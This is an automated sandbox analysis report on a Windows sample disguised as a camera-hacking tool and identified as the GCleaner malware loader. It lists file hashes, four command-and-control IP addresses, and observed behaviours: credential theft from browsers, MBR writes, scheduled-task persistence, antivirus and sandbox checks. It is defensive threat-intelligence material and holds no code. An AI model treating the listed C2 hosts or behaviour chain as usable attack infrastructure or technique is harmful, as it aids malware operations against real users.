gcleaner | b89f3ebe1ac94726b821a3c23464236586364d2756881a32bef853e7183739ab

Analysis

max time kernel
112s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2023 19:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vzlom-kamer-by-neit_wcEYk7hQ.exe
Size

4.5MB
MD5

fe0f3853a9f25f71af7a13b313d8521b
SHA1

d868f1263393e0440605abe012e6a7626b12bca9
SHA256

b89f3ebe1ac94726b821a3c23464236586364d2756881a32bef853e7183739ab
SHA512

ea878fd94bee5aa1bc77e64fa6350e6ddcb2d88c32e341ab320701af1feefd424167a46f863c5d1c5226448fe8539f4c8f76e76b6ec49ee2674438ac0bea7a76
SSDEEP

98304:nP4tWsF8pOX+Q9WZps5699OChBZ/MrbmY2NTeM6T/Mn:P4tWsFNX+9I61hBZ8bm9TW/Mn

Score

10^/10

gcleaner bootkit discovery loader persistence spyware stealer

Malware Config

Extracted

Family

gcleaner

85.31.45.39

85.31.45.250

85.31.45.251

85.31.45.88

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

71r9O7Y9zIfGXmeBiL.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71r9O7Y9zIfGXmeBiL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	71r9O7Y9zIfGXmeBiL.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

71r9O7Y9zIfGXmeBiL.exeFileDate329.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	71r9O7Y9zIfGXmeBiL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	FileDate329.exe

Executes dropped EXE 12 IoCs

Processes:

is-75BBU.tmpIC329.exeIC329.exevzlom_kamer_by_neit.rar_id25861706.exeDMfcPC.exe71r9O7Y9zIfGXmeBiL.exeis-LA33S.tmpFileDate329.exe9nx2u.exeis-GRU8E.tmpSyncBackupShell.exekSdbFaL.exe

pid	process
4500	is-75BBU.tmp
4668	IC329.exe
2144	IC329.exe
3372	vzlom_kamer_by_neit.rar_id25861706.exe
2772	DMfcPC.exe
3124	71r9O7Y9zIfGXmeBiL.exe
4036	is-LA33S.tmp
3448	FileDate329.exe
2396	9nx2u.exe
2236	is-GRU8E.tmp
4952	SyncBackupShell.exe
820	kSdbFaL.exe

Loads dropped DLL 7 IoCs

Processes:

is-75BBU.tmpis-LA33S.tmpis-GRU8E.tmp

pid process

4500 is-75BBU.tmp
4036 is-LA33S.tmp
4036 is-LA33S.tmp
4036 is-LA33S.tmp
2236 is-GRU8E.tmp
2236 is-GRU8E.tmp
2236 is-GRU8E.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks for any installed AV software in registry 1 TTPs 4 IoCs

Security Software Discovery

T1063

Processes:

IC329.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	IC329.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	IC329.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	IC329.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	IC329.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

vzlom_kamer_by_neit.rar_id25861706.exe

description ioc process

File opened for modification \??\PhysicalDrive0 vzlom_kamer_by_neit.rar_id25861706.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	vzlom_kamer_by_neit.rar_id25861706.exe

Drops file in System32 directory 6 IoCs

Processes:

71r9O7Y9zIfGXmeBiL.exepowershell.exepowershell.exekSdbFaL.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	71r9O7Y9zIfGXmeBiL.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	kSdbFaL.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	kSdbFaL.exe

Drops file in Program Files directory 56 IoCs

Processes:

is-75BBU.tmpis-GRU8E.tmpSyncBackupShell.exe

description	ioc	process
File created	C:\Program Files (x86)\ImageComparer\is-59ERO.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-JVMH1.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-NFTTB.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-02UP6.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-3HKL3.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-B2520.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-3E878.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-FM8N5.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-NDHHD.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\Languages\is-KD929.tmp	is-GRU8E.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\unins000.dat	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-OMFNE.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-1E15F.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-E5S6K.tmp	is-75BBU.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\ImageComparer.url	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\unins000.dat	is-GRU8E.tmp
File opened for modification	C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-KNL17.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\images\is-2CBSA.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\BKngBackup\is-4U2SJ.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\images\is-CVLEC.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-PQ96C.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-VIDUL.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-3AFQR.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\images\is-VOAF7.tmp	is-GRU8E.tmp
File opened for modification	C:\Program Files (x86)\BKngBackup\unins000.dat	is-GRU8E.tmp
File created	C:\Program Files (x86)\clFlow	SyncBackupShell.exe
File created	C:\Program Files (x86)\ImageComparer\is-4IIBK.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\is-UJJEO.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-EE50I.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-RCGCO.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\is-I5LUF.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-O00K5.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\is-BTL1T.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\BKngBackup\is-92OVL.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\BKngBackup\is-IGMAP.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\is-917MI.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\is-B627N.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-AAOHE.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-E1AL8.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-S6N81.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-2GHK1.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-BL8UK.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-BUJ01.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-SQQJH.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\is-2IVB9.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\unins000.dat	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-I3SP5.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\is-6PB6V.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\is-MHHNR.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-THHLJ.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-6O37R.tmp	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\is-9AAOS.tmp	is-GRU8E.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-T5AHA.tmp	is-75BBU.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\IC329.exe	is-75BBU.tmp
File created	C:\Program Files (x86)\BKngBackup\Help\images\is-FNRT1.tmp	is-GRU8E.tmp

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bIIVPNBwJtQvPFWhKj.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bIIVPNBwJtQvPFWhKj.job	schtasks.exe

Program crash 45 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4880	4668	WerFault.exe	IC329.exe
4592	4668	WerFault.exe	IC329.exe
3360	4668	WerFault.exe	IC329.exe
1888	4668	WerFault.exe	IC329.exe
3124	2144	WerFault.exe	IC329.exe
4544	2144	WerFault.exe	IC329.exe
1428	2144	WerFault.exe	IC329.exe
4608	2144	WerFault.exe	IC329.exe
3188	2144	WerFault.exe	IC329.exe
2124	2144	WerFault.exe	IC329.exe
1768	2144	WerFault.exe	IC329.exe
3988	2144	WerFault.exe	IC329.exe
1840	2144	WerFault.exe	IC329.exe
1980	2144	WerFault.exe	IC329.exe
4480	2144	WerFault.exe	IC329.exe
4296	2144	WerFault.exe	IC329.exe
2820	2144	WerFault.exe	IC329.exe
2808	2144	WerFault.exe	IC329.exe
2932	2144	WerFault.exe	IC329.exe
2148	2144	WerFault.exe	IC329.exe
4152	2144	WerFault.exe	IC329.exe
552	2144	WerFault.exe	IC329.exe
4608	2144	WerFault.exe	IC329.exe
4712	2144	WerFault.exe	IC329.exe
2608	2144	WerFault.exe	IC329.exe
2128	2144	WerFault.exe	IC329.exe
4532	2144	WerFault.exe	IC329.exe
2236	2144	WerFault.exe	IC329.exe
3344	2144	WerFault.exe	IC329.exe
3216	2144	WerFault.exe	IC329.exe
1980	2144	WerFault.exe	IC329.exe
652	2144	WerFault.exe	IC329.exe
4104	2144	WerFault.exe	IC329.exe
3520	2144	WerFault.exe	IC329.exe
516	2144	WerFault.exe	IC329.exe
2864	2144	WerFault.exe	IC329.exe
2952	2144	WerFault.exe	IC329.exe
2132	2144	WerFault.exe	IC329.exe
4296	2144	WerFault.exe	IC329.exe
4856	2144	WerFault.exe	IC329.exe
4708	2144	WerFault.exe	IC329.exe
3188	2144	WerFault.exe	IC329.exe
792	2144	WerFault.exe	IC329.exe
4256	2144	WerFault.exe	IC329.exe
2896	2144	WerFault.exe	IC329.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1124 schtasks.exe
1552 schtasks.exe
3244 schtasks.exe

pid	process
1124	schtasks.exe
1552	schtasks.exe
3244	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

71r9O7Y9zIfGXmeBiL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	71r9O7Y9zIfGXmeBiL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	71r9O7Y9zIfGXmeBiL.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3728 taskkill.exe

pid	process
3728	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

IC329.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings IC329.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	IC329.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exeIC329.exevzlom_kamer_by_neit.rar_id25861706.exepowershell.EXE

pid	process
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
2144	IC329.exe
2144	IC329.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
2144	IC329.exe
2144	IC329.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3372	vzlom_kamer_by_neit.rar_id25861706.exe
3372	vzlom_kamer_by_neit.rar_id25861706.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3732	powershell.EXE
3524	taskmgr.exe
3732	powershell.EXE
3732	powershell.EXE
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

taskmgr.exetaskkill.exepowershell.EXEpowershell.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	3524	taskmgr.exe
Token: SeSystemProfilePrivilege	3524	taskmgr.exe
Token: SeCreateGlobalPrivilege	3524	taskmgr.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	3732	powershell.EXE
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	720	powershell.EXE
Token: 33	3524	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3524	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exevzlom_kamer_by_neit.rar_id25861706.exe

pid	process
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3372	vzlom_kamer_by_neit.rar_id25861706.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe
3524	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

vzlom_kamer_by_neit.rar_id25861706.exe

pid process

3372 vzlom_kamer_by_neit.rar_id25861706.exe
3372 vzlom_kamer_by_neit.rar_id25861706.exe

pid	process
3372	vzlom_kamer_by_neit.rar_id25861706.exe
3372	vzlom_kamer_by_neit.rar_id25861706.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

vzlom-kamer-by-neit_wcEYk7hQ.exeis-75BBU.tmpnet.exenet.exeIC329.exeDMfcPC.exeis-LA33S.tmpnet.exe9nx2u.exe71r9O7Y9zIfGXmeBiL.exeis-GRU8E.tmpWerFault.exeWerFault.exeWerFault.execmd.exe

description	pid	process	target process
PID 2724 wrote to memory of 4500	2724	vzlom-kamer-by-neit_wcEYk7hQ.exe	is-75BBU.tmp
PID 2724 wrote to memory of 4500	2724	vzlom-kamer-by-neit_wcEYk7hQ.exe	is-75BBU.tmp
